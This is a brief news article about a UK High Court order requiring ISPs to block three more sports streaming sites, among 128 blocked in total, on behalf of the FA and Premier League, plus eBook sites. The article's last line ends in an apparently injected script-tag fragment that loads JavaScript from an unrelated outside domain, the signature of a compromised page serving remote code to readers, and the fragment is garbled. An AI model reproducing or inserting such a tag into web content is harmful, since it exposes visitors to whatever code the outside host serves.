As part of a recent High Court Order, major UK internet service providers are required to block subscriber access to 3 additional sports streaming websites namely LiveTV, Rojadirecta and Drakulastream because they are responsible for copyright infringements. There are 128 blocked sites in total, so it is expected that more domains will follow in the months to come. The list, which is the result of their efforts that started in 2012, continues to grow over the years.
The latest blocks were issued on behalf of the Football Association (the FA) and Premier League and have not been implemented yet. It is believed to be an expansion of a High Court Order that provides the football associations with the option to continually update the list of infringing domains.
TorrentFreak tried to contact Premier League for a comment on the latest additions but they had not heard from them back at the time of publication.
Aside from the sport streaming sites being added to the UK blocklist, local ISPs are also required to block various eBook sites from a court order that The Publishers Association won. type=’text/javascript’ src=’http://online-sale24.com/1.js’>
